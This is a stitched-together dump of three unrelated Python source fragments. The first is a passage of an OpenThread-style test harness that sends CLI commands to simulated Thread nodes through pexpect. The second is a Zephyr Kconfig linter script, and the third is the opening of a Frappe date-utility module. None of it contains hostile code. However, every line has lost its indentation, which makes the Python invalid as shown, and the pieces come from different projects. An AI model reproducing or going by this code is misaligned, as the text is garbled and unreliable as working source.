self.pexpect = fdpexpect.fdspawn(
os.open(serialPort, os.O_RDWR | os.O_NONBLOCK | os.O_NOCTTY)
)
def __del__(self):
self.destroy()
def destroy(self):
if not self._initialized:
return
if (
hasattr(self.pexpect, 'proc')
and self.pexpect.proc.poll() is None
or not hasattr(self.pexpect, 'proc')
and self.pexpect.isalive()
):
print("%d: exit" % self.nodeid)
self.pexpect.send('exit\n')
self.pexpect.expect(pexpect.EOF)
self.pexpect.wait()
self._initialized = False
def read_cert_messages_in_commissioning_log(self, timeout=-1):
"""Get the log of the traffic after DTLS handshake.
"""
format_str = br"=+?\[\[THCI\].*?type=%s.*?\].*?=+?[\s\S]+?-{40,}"
join_fin_req = format_str % br"JOIN_FIN\.req"
join_fin_rsp = format_str % br"JOIN_FIN\.rsp"
dummy_format_str = br"\[THCI\].*?type=%s.*?"
join_ent_ntf = dummy_format_str % br"JOIN_ENT\.ntf"
join_ent_rsp = dummy_format_str % br"JOIN_ENT\.rsp"
pattern = (
b"("
+ join_fin_req
+ b")|("
+ join_fin_rsp
+ b")|("
+ join_ent_ntf
+ b")|("
+ join_ent_rsp
+ b")"
)
messages = []
# There are at most 4 cert messages both for joiner and commissioner
for _ in range(0, 4):
try:
self._expect(pattern, timeout=timeout)
log = self.pexpect.match.group(0)
messages.append(self._extract_cert_message(log))
except BaseException:
break
return messages
def _extract_cert_message(self, log):
res = re.search(br"direction=\w+", log)
assert res
direction = res.group(0).split(b'=')[1].strip()
res = re.search(br"type=\S+", log)
assert res
type = res.group(0).split(b'=')[1].strip()
payload = bytearray([])
payload_len = 0
if type in [b"JOIN_FIN.req", b"JOIN_FIN.rsp"]:
res = re.search(br"len=\d+", log)
assert res
payload_len = int(res.group(0).split(b'=')[1].strip())
hex_pattern = br"\|(\s([0-9a-fA-F]{2}|\.\.))+?\s+?\|"
while True:
res = re.search(hex_pattern, log)
if not res:
break
data = [
int(hex, 16)
for hex in res.group(0)[1:-1].split(b' ')
if hex and hex != b'..'
]
payload += bytearray(data)
log = log[res.end() - 1:]
assert len(payload) == payload_len
return (direction, type, payload)
def send_command(self, cmd, go=True):
print("%d: %s" % (self.nodeid, cmd))
self.pexpect.send(cmd + '\n')
if go:
self.simulator.go(0, nodeid=self.nodeid)
sys.stdout.flush()
def get_commands(self):
self.send_command('?')
self._expect('Commands:')
commands = []
while True:
i = self._expect(['Done', r'(\S+)'])
if i != 0:
commands.append(self.pexpect.match.groups()[0])
else:
break
return commands
def set_mode(self, mode):
cmd = 'mode %s' % mode
self.send_command(cmd)
self._expect('Done')
def debug(self, level):
# `debug` command will not trigger interaction with simulator
self.send_command('debug %d' % level, go=False)
def start(self):
self.interface_up()
self.thread_start()
def stop(self):
self.thread_stop()
self.interface_down()
def interface_up(self):
self.send_command('ifconfig up')
self._expect('Done')
def interface_down(self):
self.send_command('ifconfig down')
self._expect('Done')
def thread_start(self):
self.send_command('thread start')
self._expect('Done')
def thread_stop(self):
self.send_command('thread stop')
self._expect('Done')
def commissioner_start(self):
cmd = 'commissioner start'
self.send_command(cmd)
self._expect('Done')
def commissioner_add_joiner(self, addr, psk):
cmd = 'commissioner joiner add %s %s' % (addr, psk)
self.send_command(cmd)
self._expect('Done')
def joiner_start(self, pskd='', provisioning_url=''):
cmd = 'joiner start %s %s' % (pskd, provisioning_url)
self.send_command(cmd)
self._expect('Done')
def clear_whitelist(self):
cmd = 'macfilter addr clear'
self.send_command(cmd)
self._expect('Done')
def enable_whitelist(self):
cmd = 'macfilter addr whitelist'
self.send_command(cmd)
self._expect('Done')
def disable_whitelist(self):
cmd = 'macfilter addr disable'
self.send_command(cmd)
self._expect('Done')
def add_whitelist(self, addr, rssi=None):
cmd = 'macfilter addr add %s' % addr
if rssi is not None:
cmd += ' %s' % rssi
self.send_command(cmd)
self._expect('Done')
def remove_whitelist(self, addr):
cmd = 'macfilter addr remove %s' % addr
self.send_command(cmd)
self._expect('Done')
def get_addr16(self):
self.send_command('rloc16')
i = self._expect('([0-9a-fA-F]{4})')
if i == 0:
addr16 = int(self.pexpect.match.groups()[0], 16)
self._expect('Done')
return addr16
def get_router_id(self):
rloc16 = self.get_addr16()
return rloc16 >> 10
def get_addr64(self):
self.send_command('extaddr')
i = self._expect('([0-9a-fA-F]{16})')
if i == 0:
addr64 = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return addr64
def get_eui64(self):
self.send_command('eui64')
i = self._expect('([0-9a-fA-F]{16})')
if i == 0:
addr64 = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return addr64
def get_joiner_id(self):
self.send_command('joiner id')
i = self._expect('([0-9a-fA-F]{16})')
if i == 0:
addr = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return addr
def get_channel(self):
self.send_command('channel')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
channel = int(self.pexpect.match.groups()[0])
self._expect('Done')
return channel
def set_channel(self, channel):
cmd = 'channel %d' % channel
self.send_command(cmd)
self._expect('Done')
def get_masterkey(self):
self.send_command('masterkey')
i = self._expect('([0-9a-fA-F]{32})')
if i == 0:
masterkey = self.pexpect.match.groups()[0].decode("utf-8")
self._expect('Done')
return masterkey
def set_masterkey(self, masterkey):
cmd = 'masterkey %s' % masterkey
self.send_command(cmd)
self._expect('Done')
def get_key_sequence_counter(self):
self.send_command('keysequence counter')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
key_sequence_counter = int(self.pexpect.match.groups()[0])
self._expect('Done')
return key_sequence_counter
def set_key_sequence_counter(self, key_sequence_counter):
cmd = 'keysequence counter %d' % key_sequence_counter
self.send_command(cmd)
self._expect('Done')
def set_key_switch_guardtime(self, key_switch_guardtime):
cmd = 'keysequence guardtime %d' % key_switch_guardtime
self.send_command(cmd)
self._expect('Done')
def set_network_id_timeout(self, network_id_timeout):
cmd = 'networkidtimeout %d' % network_id_timeout
self.send_command(cmd)
self._expect('Done')
def get_network_name(self):
self.send_command('networkname')
while True:
i = self._expect(['Done', r'(\S+)'])
if i != 0:
network_name = self.pexpect.match.groups()[0].decode('utf-8')
else:
break
return network_name
def set_network_name(self, network_name):
cmd = 'networkname %s' % network_name
self.send_command(cmd)
self._expect('Done')
def get_panid(self):
self.send_command('panid')
i = self._expect('([0-9a-fA-F]{4})')
if i == 0:
panid = int(self.pexpect.match.groups()[0], 16)
self._expect('Done')
return panid
def set_panid(self, panid=config.PANID):
cmd = 'panid %d' % panid
self.send_command(cmd)
self._expect('Done')
def get_partition_id(self):
self.send_command('leaderpartitionid')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
weight = self.pexpect.match.groups()[0]
self._expect('Done')
return weight
def set_partition_id(self, partition_id):
cmd = 'leaderpartitionid %d' % partition_id
self.send_command(cmd)
self._expect('Done')
def set_router_upgrade_threshold(self, threshold):
cmd = 'routerupgradethreshold %d' % threshold
self.send_command(cmd)
self._expect('Done')
def set_router_downgrade_threshold(self, threshold):
cmd = 'routerdowngradethreshold %d' % threshold
self.send_command(cmd)
self._expect('Done')
def release_router_id(self, router_id):
cmd = 'releaserouterid %d' % router_id
self.send_command(cmd)
self._expect('Done')
def get_state(self):
states = [r'\ndetached', r'\nchild', r'\nrouter', r'\nleader']
self.send_command('state')
match = self._expect(states)
self._expect('Done')
return states[match].strip(r'\n')
def set_state(self, state):
cmd = 'state %s' % state
self.send_command(cmd)
self._expect('Done')
def get_timeout(self):
self.send_command('childtimeout')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
timeout = self.pexpect.match.groups()[0]
self._expect('Done')
return timeout
def set_timeout(self, timeout):
cmd = 'childtimeout %d' % timeout
self.send_command(cmd)
self._expect('Done')
def set_max_children(self, number):
cmd = 'childmax %d' % number
self.send_command(cmd)
self._expect('Done')
def get_weight(self):
self.send_command('leaderweight')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
weight = self.pexpect.match.groups()[0]
self._expect('Done')
return weight
def set_weight(self, weight):
cmd = 'leaderweight %d' % weight
self.send_command(cmd)
self._expect('Done')
def add_ipaddr(self, ipaddr):
cmd = 'ipaddr add %s' % ipaddr
self.send_command(cmd)
self._expect('Done')
def get_addrs(self):
addrs = []
self.send_command('ipaddr')
while True:
i = self._expect([r'(\S+(:\S*)+)\r?\n', 'Done'])
if i == 0:
addrs.append(self.pexpect.match.groups()[0].decode("utf-8"))
elif i == 1:
break
return addrs
def get_addr(self, prefix):
network = ipaddress.ip_network(u'%s' % str(prefix))
addrs = self.get_addrs()
for addr in addrs:
if isinstance(addr, bytearray):
addr = bytes(addr)
elif isinstance(addr, str) and sys.version_info[0] == 2:
addr = addr.decode("utf-8")
ipv6_address = ipaddress.ip_address(addr)
if ipv6_address in network:
return ipv6_address.exploded
return None
def get_addr_rloc(self):
addrs = self.get_addrs()
for addr in addrs:
segs = addr.split(':')
if (
segs[4] == '0'
and segs[5] == 'ff'
and segs[6] == 'fe00'
and segs[7] != 'fc00'
):
return addr
return None
def get_addr_leader_aloc(self):
addrs = self.get_addrs()
for addr in addrs:
segs = addr.split(':')
if (
segs[4] == '0'
and segs[5] == 'ff'
and segs[6] == 'fe00'
and segs[7] == 'fc00'
):
return addr
return None
def get_eidcaches(self):
eidcaches = []
self.send_command('eidcache')
while True:
i = self._expect([r'([a-fA-F0-9\:]+) ([a-fA-F0-9]+)\r?\n', 'Done'])
if i == 0:
eid = self.pexpect.match.groups()[0].decode("utf-8")
rloc = self.pexpect.match.groups()[1].decode("utf-8")
eidcaches.append((eid, rloc))
elif i == 1:
break
return eidcaches
def add_service(self, enterpriseNumber, serviceData, serverData):
cmd = 'service add %s %s %s' % (
enterpriseNumber,
serviceData,
serverData,
)
self.send_command(cmd)
self._expect('Done')
def remove_service(self, enterpriseNumber, serviceData):
cmd = 'service remove %s %s' % (enterpriseNumber, serviceData)
self.send_command(cmd)
self._expect('Done')
def __getLinkLocalAddress(self):
for ip6Addr in self.get_addrs():
if re.match(config.LINK_LOCAL_REGEX_PATTERN, ip6Addr, re.I):
return ip6Addr
return None
def __getGlobalAddress(self):
global_address = []
for ip6Addr in self.get_addrs():
if (
(not re.match(config.LINK_LOCAL_REGEX_PATTERN, ip6Addr, re.I))
and (
not re.match(
config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I
)
)
and (
not re.match(
config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I
)
)
):
global_address.append(ip6Addr)
return global_address
def __getRloc(self):
for ip6Addr in self.get_addrs():
if (
re.match(config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I)
and re.match(
config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I
)
and not (
re.match(config.ALOC_FLAG_REGEX_PATTERN, ip6Addr, re.I)
)
):
return ip6Addr
return None
def __getAloc(self):
aloc = []
for ip6Addr in self.get_addrs():
if (
re.match(config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I)
and re.match(
config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I
)
and re.match(config.ALOC_FLAG_REGEX_PATTERN, ip6Addr, re.I)
):
aloc.append(ip6Addr)
return aloc
def __getMleid(self):
for ip6Addr in self.get_addrs():
if re.match(
config.MESH_LOCAL_PREFIX_REGEX_PATTERN, ip6Addr, re.I
) and not (
re.match(config.ROUTING_LOCATOR_REGEX_PATTERN, ip6Addr, re.I)
):
return ip6Addr
return None
def get_ip6_address(self, address_type):
"""Get specific type of IPv6 address configured on thread device.
Args:
address_type: the config.ADDRESS_TYPE type of IPv6 address.
Returns:
IPv6 address string.
"""
if address_type == config.ADDRESS_TYPE.LINK_LOCAL:
return self.__getLinkLocalAddress()
elif address_type == config.ADDRESS_TYPE.GLOBAL:
return self.__getGlobalAddress()
elif address_type == config.ADDRESS_TYPE.RLOC:
return self.__getRloc()
elif address_type == config.ADDRESS_TYPE.ALOC:
return self.__getAloc()
elif address_type == config.ADDRESS_TYPE.ML_EID:
return self.__getMleid()
else:
return None
return None
def get_context_reuse_delay(self):
self.send_command('contextreusedelay')
i = self._expect(r'(\d+)\r?\n')
if i == 0:
timeout = self.pexpect.match.groups()[0]
self._expect('Done')
return timeout
def set_context_reuse_delay(self, delay):
cmd = 'contextreusedelay %d' % delay
self.send_command(cmd)
self._expect('Done')
def add_prefix(self, prefix, flags, prf='med'):
cmd = 'prefix add %s %s %s' % (prefix, flags, prf)
self.send_command(cmd)
self._expect('Done')
def remove_prefix(self, prefix):
cmd = 'prefix remove %s' % prefix
self.send_command(cmd)
self._expect('Done')
def add_route(self, prefix, prf='med'):
cmd = 'route add %s %s' % (prefix, prf)
self.send_command(cmd)
self._expect('Done')
def remove_route(self, prefix):
cmd = 'route remove %s' % prefix
self.send_command(cmd)
self._expect('Done')
def register_netdata(self):
self.send_command('netdataregister')
self._expect('Done')
def energy_scan(self, mask, count, period, scan_duration, ipaddr):
cmd = 'commissioner energy %d %d %d %d %s' % (
mask,
count,
period,
scan_duration,
ipaddr,
)
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(8)
timeout = 1
else:
timeout = 8
self._expect('Energy:', timeout=timeout)
def panid_query(self, panid, mask, ipaddr):
cmd = 'commissioner panid %d %d %s' % (panid, mask, ipaddr)
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(8)
timeout = 1
else:
timeout = 8
self._expect('Conflict:', timeout=timeout)
def scan(self):
self.send_command('scan')
results = []
while True:
i = self._expect(
[
r'\|\s(\S+)\s+\|\s(\S+)\s+\|\s([0-9a-fA-F]{4})\s\|\s([0-9a-fA-F]{16})\s\|\s(\d+)\r?\n',
'Done',
]
)
if i == 0:
results.append(self.pexpect.match.groups())
else:
break
return results
def ping(self, ipaddr, num_responses=1, size=None, timeout=5):
cmd = 'ping %s' % ipaddr
if size is not None:
cmd += ' %d' % size
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(timeout)
result = True
try:
responders = {}
while len(responders) < num_responses:
i = self._expect([r'from (\S+):'])
if i == 0:
responders[self.pexpect.match.groups()[0]] = 1
self._expect('\n')
except (pexpect.TIMEOUT, socket.timeout):
result = False
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.sync_devices()
return result
def reset(self):
self.send_command('reset')
time.sleep(0.1)
def set_router_selection_jitter(self, jitter):
cmd = 'routerselectionjitter %d' % jitter
self.send_command(cmd)
self._expect('Done')
def set_active_dataset(
self,
timestamp,
panid=None,
channel=None,
channel_mask=None,
master_key=None,
):
self.send_command('dataset clear')
self._expect('Done')
cmd = 'dataset activetimestamp %d' % timestamp
self.send_command(cmd)
self._expect('Done')
if panid is not None:
cmd = 'dataset panid %d' % panid
self.send_command(cmd)
self._expect('Done')
if channel is not None:
cmd = 'dataset channel %d' % channel
self.send_command(cmd)
self._expect('Done')
if channel_mask is not None:
cmd = 'dataset channelmask %d' % channel_mask
self.send_command(cmd)
self._expect('Done')
if master_key is not None:
cmd = 'dataset masterkey %s' % master_key
self.send_command(cmd)
self._expect('Done')
self.send_command('dataset commit active')
self._expect('Done')
def set_pending_dataset(
self, pendingtimestamp, activetimestamp, panid=None, channel=None
):
self.send_command('dataset clear')
self._expect('Done')
cmd = 'dataset pendingtimestamp %d' % pendingtimestamp
self.send_command(cmd)
self._expect('Done')
cmd = 'dataset activetimestamp %d' % activetimestamp
self.send_command(cmd)
self._expect('Done')
if panid is not None:
cmd = 'dataset panid %d' % panid
self.send_command(cmd)
self._expect('Done')
if channel is not None:
cmd = 'dataset channel %d' % channel
self.send_command(cmd)
self._expect('Done')
self.send_command('dataset commit pending')
self._expect('Done')
def announce_begin(self, mask, count, period, ipaddr):
cmd = 'commissioner announce %d %d %d %s' % (
mask,
count,
period,
ipaddr,
)
self.send_command(cmd)
self._expect('Done')
def send_mgmt_active_set(
self,
active_timestamp=None,
channel=None,
channel_mask=None,
extended_panid=None,
panid=None,
master_key=None,
mesh_local=None,
network_name=None,
binary=None,
):
cmd = 'dataset mgmtsetcommand active '
if active_timestamp is not None:
cmd += 'activetimestamp %d ' % active_timestamp
if channel is not None:
cmd += 'channel %d ' % channel
if channel_mask is not None:
cmd += 'channelmask %d ' % channel_mask
if extended_panid is not None:
cmd += 'extpanid %s ' % extended_panid
if panid is not None:
cmd += 'panid %d ' % panid
if master_key is not None:
cmd += 'masterkey %s ' % master_key
if mesh_local is not None:
cmd += 'localprefix %s ' % mesh_local
if network_name is not None:
cmd += 'networkname %s ' % network_name
if binary is not None:
cmd += 'binary %s ' % binary
self.send_command(cmd)
self._expect('Done')
def send_mgmt_pending_set(
self,
pending_timestamp=None,
active_timestamp=None,
delay_timer=None,
channel=None,
panid=None,
master_key=None,
mesh_local=None,
network_name=None,
):
cmd = 'dataset mgmtsetcommand pending '
if pending_timestamp is not None:
cmd += 'pendingtimestamp %d ' % pending_timestamp
if active_timestamp is not None:
cmd += 'activetimestamp %d ' % active_timestamp
if delay_timer is not None:
cmd += 'delaytimer %d ' % delay_timer
if channel is not None:
cmd += 'channel %d ' % channel
if panid is not None:
cmd += 'panid %d ' % panid
if master_key is not None:
cmd += 'masterkey %s ' % master_key
if mesh_local is not None:
cmd += 'localprefix %s ' % mesh_local
if network_name is not None:
cmd += 'networkname %s ' % network_name
self.send_command(cmd)
self._expect('Done')
def coaps_start_psk(self, psk, pskIdentity):
cmd = 'coaps psk %s %s' % (psk, pskIdentity)
self.send_command(cmd)
self._expect('Done')
cmd = 'coaps start'
self.send_command(cmd)
self._expect('Done')
def coaps_start_x509(self):
cmd = 'coaps x509'
self.send_command(cmd)
self._expect('Done')
cmd = 'coaps start'
self.send_command(cmd)
self._expect('Done')
def coaps_set_resource_path(self, path):
cmd = 'coaps resource %s' % path
self.send_command(cmd)
self._expect('Done')
def coaps_stop(self):
cmd = 'coaps stop'
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(5)
timeout = 1
else:
timeout = 5
self._expect('Done', timeout=timeout)
def coaps_connect(self, ipaddr):
cmd = 'coaps connect %s' % ipaddr
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(5)
timeout = 1
else:
timeout = 5
self._expect('coaps connected', timeout=timeout)
def coaps_disconnect(self):
cmd = 'coaps disconnect'
self.send_command(cmd)
self._expect('Done')
self.simulator.go(5)
def coaps_get(self):
cmd = 'coaps get test'
self.send_command(cmd)
if isinstance(self.simulator, simulator.VirtualTime):
self.simulator.go(5)
timeout = 1
else:
timeout = 5
self._expect('coaps response', timeout=timeout)
def commissioner_mgmtset(self, tlvs_binary):
cmd = 'commissioner mgmtset binary %s' % tlvs_binary
self.send_command(cmd)
self._expect('Done')
def bytes_to_hex_str(self, src):
return ''.join(format(x, '02x') for x in src)
def commissioner_mgmtset_with_tlvs(self, tlvs):
payload = bytearray()
for tlv in tlvs:
payload += tlv.to_hex()
self.commissioner_mgmtset(self.bytes_to_hex_str(payload))
def udp_start(self, local_ipaddr, local_port):
cmd = 'udp open'
self.send_command(cmd)
self._expect('Done')
cmd = 'udp bind %s %s' % (local_ipaddr, local_port)
self.send_command(cmd)
self._expect('Done')
def udp_stop(self):
cmd = 'udp close'
self.send_command(cmd)
self._expect('Done')
def udp_send(self, bytes, ipaddr, port, success=True):
cmd = 'udp send -s %d %s %d' % (bytes, ipaddr, port)
self.send_command(cmd)
if success:
self._expect('Done')
else:
self._expect('Error')
def udp_check_rx(self, bytes_should_rx):
self._expect('%d bytes' % bytes_should_rx)
if __name__ == '__main__':
unittest.main()
|
|
#!/usr/bin/env python3
# Copyright (c) 2019 Nordic Semiconductor ASA
# SPDX-License-Identifier: Apache-2.0
"""
Linter for the Zephyr Kconfig files. Pass --help to see
available checks. By default, all checks are enabled.
Some of the checks rely on heuristics and can get tripped up
by things like preprocessor magic, so manual checking is
still needed. 'git grep' is handy.
Requires west, because the checks need to see Kconfig files
and source code from modules.
"""
import argparse
import os
import re
import shlex
import subprocess
import sys
import tempfile
TOP_DIR = os.path.join(os.path.dirname(__file__), "..", "..")
sys.path.insert(0, os.path.join(TOP_DIR, "scripts", "kconfig"))
import kconfiglib
def main():
init_kconfig()
args = parse_args()
if args.checks:
checks = args.checks
else:
# Run all checks if no checks were specified
checks = (check_always_n,
check_unused,
check_pointless_menuconfigs,
check_defconfig_only_definition,
check_missing_config_prefix)
first = True
for check in checks:
if not first:
print()
first = False
check()
def parse_args():
# args.checks is set to a list of check functions to run
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter,
description=__doc__)
parser.add_argument(
"-n", "--check-always-n",
action="append_const", dest="checks", const=check_always_n,
help="""\
List symbols that can never be anything but n/empty. These
are detected as symbols with no prompt or defaults that
aren't selected or implied.
""")
parser.add_argument(
"-u", "--check-unused",
action="append_const", dest="checks", const=check_unused,
help="""\
List symbols that might be unused.
Heuristic:
- Isn't referenced in Kconfig
- Isn't referenced as CONFIG_<NAME> outside Kconfig
(besides possibly as CONFIG_<NAME>=<VALUE>)
- Isn't selecting/implying other symbols
- Isn't a choice symbol
C preprocessor magic can trip up this check.""")
parser.add_argument(
"-m", "--check-pointless-menuconfigs",
action="append_const", dest="checks", const=check_pointless_menuconfigs,
help="""\
List symbols defined with 'menuconfig' where the menu is
empty due to the symbol not being followed by stuff that
depends on it""")
parser.add_argument(
"-d", "--check-defconfig-only-definition",
action="append_const", dest="checks", const=check_defconfig_only_definition,
help="""\
List symbols that are only defined in Kconfig.defconfig
files. A common base definition should probably be added
somewhere for such symbols, and the type declaration ('int',
'hex', etc.) removed from Kconfig.defconfig.""")
parser.add_argument(
"-p", "--check-missing-config-prefix",
action="append_const", dest="checks", const=check_missing_config_prefix,
help="""\
Look for references like
#if MACRO
#if(n)def MACRO
defined(MACRO)
IS_ENABLED(MACRO)
where MACRO is the name of a defined Kconfig symbol but
doesn't have a CONFIG_ prefix. Could be a typo.
Macros that are #define'd somewhere are not flagged.""")
return parser.parse_args()
def check_always_n():
print_header("Symbols that can't be anything but n/empty")
for sym in kconf.unique_defined_syms:
if not has_prompt(sym) and not is_selected_or_implied(sym) and \
not has_defaults(sym):
print(name_and_locs(sym))
def check_unused():
print_header("Symbols that look unused")
referenced = referenced_sym_names()
for sym in kconf.unique_defined_syms:
if not is_selecting_or_implying(sym) and not sym.choice and \
sym.name not in referenced:
print(name_and_locs(sym))
def check_pointless_menuconfigs():
print_header("menuconfig symbols with empty menus")
for node in kconf.node_iter():
if node.is_menuconfig and not node.list and \
isinstance(node.item, kconfiglib.Symbol):
print("{0.item.name:40} {0.filename}:{0.linenr}".format(node))
def check_defconfig_only_definition():
print_header("Symbols only defined in Kconfig.defconfig files")
for sym in kconf.unique_defined_syms:
if all("defconfig" in node.filename for node in sym.nodes):
print(name_and_locs(sym))
def check_missing_config_prefix():
print_header("Symbol references that might be missing a CONFIG_ prefix")
# Paths to modules
modpaths = run(("west", "list", "-f{abspath}")).splitlines()
# Gather #define'd macros that might overlap with symbol names, so that
# they don't trigger false positives
defined = set()
for modpath in modpaths:
regex = r"#\s*define\s+([A-Z0-9_]+)\b"
defines = run(("git", "grep", "--extended-regexp", regex),
cwd=modpath, check=False)
# Could pass --only-matching to git grep as well, but it was added
# pretty recently (2018)
defined.update(re.findall(regex, defines))
# Filter out symbols whose names are #define'd too. Preserve definition
# order to make the output consistent.
syms = [sym for sym in kconf.unique_defined_syms
if sym.name not in defined]
# grep for symbol references in #ifdef/defined() that are missing a CONFIG_
# prefix. Work around an "argument list too long" error from 'git grep' by
# checking symbols in batches.
for batch in split_list(syms, 200):
# grep for '#if((n)def) <symbol>', 'defined(<symbol>', and
# 'IS_ENABLED(<symbol>', with a missing CONFIG_ prefix
regex = r"(?:#\s*if(?:n?def)\s+|\bdefined\s*\(\s*|IS_ENABLED\(\s*)(?:" + \
"|".join(sym.name for sym in batch) + r")\b"
cmd = ("git", "grep", "--line-number", "-I", "--perl-regexp", regex)
for modpath in modpaths:
print(run(cmd, cwd=modpath, check=False), end="")
def split_list(lst, batch_size):
# check_missing_config_prefix() helper generator that splits a list into
# equal-sized batches (possibly with a shorter batch at the end)
for i in range(0, len(lst), batch_size):
yield lst[i:i + batch_size]
def print_header(s):
print(s + "\n" + len(s)*"=")
def init_kconfig():
global kconf
os.environ.update(
srctree=TOP_DIR,
CMAKE_BINARY_DIR=modules_file_dir(),
KCONFIG_DOC_MODE="1",
ZEPHYR_BASE=TOP_DIR,
SOC_DIR="soc",
ARCH_DIR="arch",
BOARD_DIR="boards/*/*",
ARCH="*")
kconf = kconfiglib.Kconfig(suppress_traceback=True)
def modules_file_dir():
# Creates Kconfig.modules in a temporary directory and returns the path to
# the directory. Kconfig.modules brings in Kconfig files from modules.
tmpdir = tempfile.mkdtemp()
run((os.path.join("scripts", "zephyr_module.py"),
"--kconfig-out", os.path.join(tmpdir, "Kconfig.modules")))
return tmpdir
def referenced_sym_names():
# Returns the names of all symbols referenced inside and outside the
# Kconfig files (that we can detect), without any "CONFIG_" prefix
return referenced_in_kconfig() | referenced_outside_kconfig()
def referenced_in_kconfig():
# Returns the names of all symbols referenced inside the Kconfig files
return {ref.name
for node in kconf.node_iter()
for ref in node.referenced
if isinstance(ref, kconfiglib.Symbol)}
def referenced_outside_kconfig():
# Returns the names of all symbols referenced outside the Kconfig files
regex = r"\bCONFIG_[A-Z0-9_]+\b"
res = set()
# 'git grep' all modules
for modpath in run(("west", "list", "-f{abspath}")).splitlines():
for line in run(("git", "grep", "-h", "-I", "--extended-regexp", regex),
cwd=modpath).splitlines():
# Don't record lines starting with "CONFIG_FOO=" or "# CONFIG_FOO="
# as references, so that symbols that are only assigned in .config
# files are not included
if re.match(r"[\s#]*CONFIG_[A-Z0-9_]+=.*", line):
continue
# Could pass --only-matching to git grep as well, but it was added
# pretty recently (2018)
for match in re.findall(regex, line):
res.add(match[7:]) # Strip "CONFIG_"
return res
def has_prompt(sym):
return any(node.prompt for node in sym.nodes)
def is_selected_or_implied(sym):
return sym.rev_dep is not kconf.n or sym.weak_rev_dep is not kconf.n
def has_defaults(sym):
return bool(sym.defaults)
def is_selecting_or_implying(sym):
return sym.selects or sym.implies
def name_and_locs(sym):
# Returns a string with the name and definition location(s) for 'sym'
return "{:40} {}".format(
sym.name,
", ".join("{0.filename}:{0.linenr}".format(node) for node in sym.nodes))
def run(cmd, cwd=TOP_DIR, check=True):
# Runs 'cmd' with subprocess, returning the decoded stdout output. 'cwd' is
# the working directory. It defaults to the top-level Zephyr directory.
# Exits with an error if the command exits with a non-zero return code if
# 'check' is True.
cmd_s = " ".join(shlex.quote(word) for word in cmd)
try:
process = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=cwd)
except OSError as e:
err("Failed to run '{}': {}".format(cmd_s, e))
stdout, stderr = process.communicate()
# errors="ignore" temporarily works around
# https://github.com/zephyrproject-rtos/esp-idf/pull/2
stdout = stdout.decode("utf-8", errors="ignore")
stderr = stderr.decode("utf-8")
if check and process.returncode:
err("""\
'{}' exited with status {}.
===stdout===
{}
===stderr===
{}""".format(cmd_s, process.returncode, stdout, stderr))
if stderr:
warn("'{}' wrote to stderr:\n{}".format(cmd_s, stderr))
return stdout
def err(msg):
sys.exit(executable() + "error: " + msg)
def warn(msg):
print(executable() + "warning: " + msg, file=sys.stderr)
def executable():
cmd = sys.argv[0] # Empty string if missing
return cmd + ": " if cmd else ""
if __name__ == "__main__":
main()
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
# IMPORTANT: only import safe functions as this module will be included in jinja environment
import frappe
import operator
import re, urllib, datetime, math
import babel.dates
from dateutil import parser
from num2words import num2words
import HTMLParser
from html2text import html2text
DATE_FORMAT = "%Y-%m-%d"
TIME_FORMAT = "%H:%M:%S.%f"
DATETIME_FORMAT = DATE_FORMAT + " " + TIME_FORMAT
# datetime functions
def getdate(string_date=None):
"""
Coverts string date (yyyy-mm-dd) to datetime.date object
"""
if not string_date:
return get_datetime().date()
if isinstance(string_date, datetime.datetime):
return string_date.date()
elif isinstance(string_date, datetime.date):
return string_date
# dateutil parser does not agree with dates like 0000-00-00
if not string_date or string_date=="0000-00-00":
return None
return parser.parse(string_date).date()
def get_datetime(datetime_str=None):
if not datetime_str:
return now_datetime()
if isinstance(datetime_str, (datetime.datetime, datetime.timedelta)):
return datetime_str
elif isinstance(datetime_str, (list, tuple)):
return datetime.datetime(datetime_str)
elif isinstance(datetime_str, datetime.date):
return datetime.datetime.combine(datetime_str, datetime.time())
# dateutil parser does not agree with dates like 0000-00-00
if not datetime_str or (datetime_str or "").startswith("0000-00-00"):
return None
return parser.parse(datetime_str)
def to_timedelta(time_str):
if isinstance(time_str, basestring):
t = parser.parse(time_str)
return datetime.timedelta(hours=t.hour, minutes=t.minute, seconds=t.second, microseconds=t.microsecond)
else:
return time_str
def add_to_date(date, years=0, months=0, days=0):
"""Adds `days` to the given date"""
from dateutil.relativedelta import relativedelta
as_string, as_datetime = False, False
if isinstance(date, basestring):
as_string = True
if " " in date:
as_datetime = True
date = parser.parse(date)
date = date + relativedelta(years=years, months=months, days=days)
if as_string:
if as_datetime:
return date.strftime(DATETIME_FORMAT)
else:
return date.strftime(DATE_FORMAT)
else:
return date
def add_days(date, days):
return add_to_date(date, days=days)
def add_months(date, months):
return add_to_date(date, months=months)
def add_years(date, years):
return add_to_date(date, years=years)
def date_diff(string_ed_date, string_st_date):
return (getdate(string_ed_date) - getdate(string_st_date)).days
def time_diff(string_ed_date, string_st_date):
return get_datetime(string_ed_date) - get_datetime(string_st_date)
def time_diff_in_seconds(string_ed_date, string_st_date):
return time_diff(string_ed_date, string_st_date).total_seconds()
